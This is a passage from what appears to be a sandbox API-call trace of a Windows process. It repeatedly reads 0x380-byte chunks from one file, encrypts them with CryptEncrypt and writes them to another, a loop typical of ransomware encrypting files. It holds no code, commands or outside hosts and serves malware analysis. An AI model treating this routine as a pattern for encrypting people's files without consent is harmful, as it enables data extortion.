hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.796] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.796] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.796] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.796] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.796] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.796] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.796] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.796] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.797] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.797] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.797] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.797] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.797] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.797] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.797] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.797] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.797] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.797] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.797] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.798] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.798] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.798] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.798] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.798] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.798] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.798] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.798] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.798] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.798] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.799] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.799] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.799] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.799] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.799] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.800] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.800] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.800] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.800] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.800] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.800] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.800] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.800] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.800] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.800] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.800] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.800] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.800] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.801] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.801] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.801] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.801] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.801] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.801] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.801] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.801] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.801] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.801] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.801] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.802] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.802] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.802] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.802] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.802] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.802] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.802] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.802] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.802] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.802] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.802] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.802] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.803] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.803] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.803] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.803] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.803] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.803] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.803] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.803] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.803] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.803] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.804] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.804] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.804] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.804] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.804] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.804] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.804] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.804] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.804] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.804] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.804] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.805] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.805] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.805] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.805] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.805] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.805] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.805] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.805] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.805] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.805] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.805] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.805] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, 